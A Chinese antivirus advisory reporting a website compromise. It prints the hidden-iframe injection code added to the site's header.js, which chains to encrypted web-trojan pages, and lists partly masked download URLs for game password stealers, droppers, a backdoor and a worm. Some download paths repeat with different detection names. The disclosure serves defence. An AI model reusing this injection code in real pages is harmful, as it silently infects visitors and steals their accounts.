|
9月24日,安天实验室反病毒监测网发现,新博网站 (www.6to***.cn)被黑客植入病毒,
用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序,
盗取用户敏感信息。
该网站的主页上的header.js代码里被添加了如下挂马代码,是3个相同的网马地址!图
所示:
//流量收购ING QQ:359574**
document.write ('<iframe src=http://xxx.74****.com/newdm
/new203.htm width=0 height=0></iframe>');
document.write ('<iframe src=http://xxx.74****.com/newdm
/new203.htm width=0 height=0></iframe>');
document.write ('<iframe src=http://xxx.74****.com/newdm
/new203.htm width=0 height=0></iframe>');。
以上是3个相同的挂马地址,所以只分析一个地址就可以了http://xxx.745***.com
/newdm/new203.htm里被插入一个挂马代码如下代码图2所示:
<iframe width='100' height='100' src=http://xxx.74****.com
/wm/014.htm'></iframe>
<iframe width='50' height='0' src='http://xxx.74****.com/wm
/gogo.htm'></iframe>
以上又是2个挂马代码,继续分析http://xxx.74****.com/wm/014.htm
得到如下网马代码:
加密网马!再分析http://xxx.74****.com/wm/gogo.htm得到结果如下:
<iframe width=0 height=0 src=two.htm></iframe>又是一个网马调用地址,继续分析two.htm的代码如下:
又出现2个挂马地址:
<iframe src=http://xxx.74****.com/wm/bf.htm width=0 height=0></iframe>
<iframe src=http://xxx.74****.com/wm/pps.htm width=0 height=0></iframe>
分析http://xxx.74****.com/wm/bf.htm的代码!如图所示:
还是加密网马。
继续分析http://xxx.74****.com/wm/pps.htm代码如下图:
显然又是加了密的网页木马。
当用户访问www.6to***.cn时,系统会自动隐藏下载以下病毒文件:
http:
//down.
dj****.cn
/dd.exe 病毒名:(Trojan-Downloader.Win32.Baser.o),下载
者木马一旦运行该木马将下载以下病毒到用户的系统,并运行。
http://down.dj****.cn/arp/1.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.ddd) 游戏盗号木马
http://down.dj****.cn/arp/2.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.cwb) 游戏盗号木马
http://down.dj****.cn/arp/3.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.dfs) 盗号木马
http://down.dj****.cn/arp/4.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.diz) 盗号木马
http://down.dj****.cn/arp/5.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.ddp) 游戏盗号木马
http://down.dj****.cn/arp/6.exe
病毒名:(Trojan-PSW.Win32.OnlineGames.cev) 游戏盗号木马
http://down.dj****.cn/arp/7.exe
病毒名:(Trojan-PSW.Win32.OnlineGames.dbb) 盗号木马
http://down.dj****.cn/arp/8.exe
病毒名:(Trojan-PSW.Win32.OnlineGames.djv) 盗号木马
http://down.dj****.cn/arp/9.exe
病毒名:(Trojan-PSW.Win32.WOW.wz) 游戏盗号木马
http://down.dj****.cn/arp/10.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.czd) 游戏盗号木马
http://down.dj****.cn/arp/11.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.cmo) 游戏盗号木马
http://down.dj****.cn/arp/12.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.djw) 游戏盗号木马
http://down.dj****.cn/arp/13.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.dgx) 游戏盗号木马
http://down.dj****.cn/arp/14.exe
病毒名:(Trojan-Dropper.Win32.Agent.bxi) 变种木马
http://down.dj****.cn/arp/15.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.cej) 游戏盗号木马
http://down.dj****.cn/arp/16.exe
病毒名:(Trojan-Dropper.Win32.Agent.bvb) 变种木马
http://down.dj****.cn/arp/17.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.dfu) 盗号木马
http://down.dj****.cn/arp/18.exe
病毒名:(Trojan-Dropper.Win32.Agent.bxv) 变种木马
http://down.dj****.cn/arp/19.exe
病毒名:(Backdoor.Win32.Hupigon.aef) 木马后门
http://18**.net/new/system22.exe
病毒名:(Worm.Win32.Viking.mc) 蠕虫
http://18**.net/new/1.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.cwb) 游戏盗号木马
http://18**.net/new/2.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.dfs) 盗号木马
http://18**.net/new/3.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.diz) 盗号木马
http://18**.net/new/4.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.dif) 游戏盗号木马
http://18**.net/new/5.exe
病毒名:(Trojan-PSW.Win32.OnlineGames.ddi) 游戏盗号木马
http://18**.net/new/6.exe
病毒名:(Trojan-PSW.Win32.OnlineGames.ceb) 盗号木马
http://18**.net/new/7.exe
病毒名:(Trojan-PSW.Win32.OnlineGames.dbe) 盗号木马
http://18**.net/new/8.exe
病毒名:(Trojan-PSW.Win32.OnlineGames.djc) 游戏盗号木马
http://18**.net/new/9.exe
病毒名:(Trojan-PSW.Win32.WOW.wx) 游戏盗号木马
http://18**.net/new/10.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.czw) 游戏盗号木马
http://18**.net/new/11.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.cmq) 游戏盗号木马
http://down.dj****.cn/arp/12.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.dji) 游戏盗号木马
http://down.dj****.cn/arp/13.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.dgz) 游戏盗号木马
http://down.dj****.cn/arp/14.exe
病毒名:(Trojan-Dropper.Win32.Agent.bxg) 变种木马
http://down.dj****.cn/arp/15.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.cbj) 游戏盗号木马
http://down.dj****.cn/arp/16.exe
病毒名:(Trojan-Dropper.Win32.Agent.bvc) 变种木马
http://down.dj****.cn/arp/17.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.dfv) 盗号木马
http://down.dj****.cn/arp/18.exe
病毒名:(Trojan-Dropper.Win32.Agent.bxd) 变种木马
http://down.dj****.cn/arp/19.exe
病毒名:(Backdoor.Win32.Hupigon.aea) 木马后门
|
内容:
病毒上报信箱: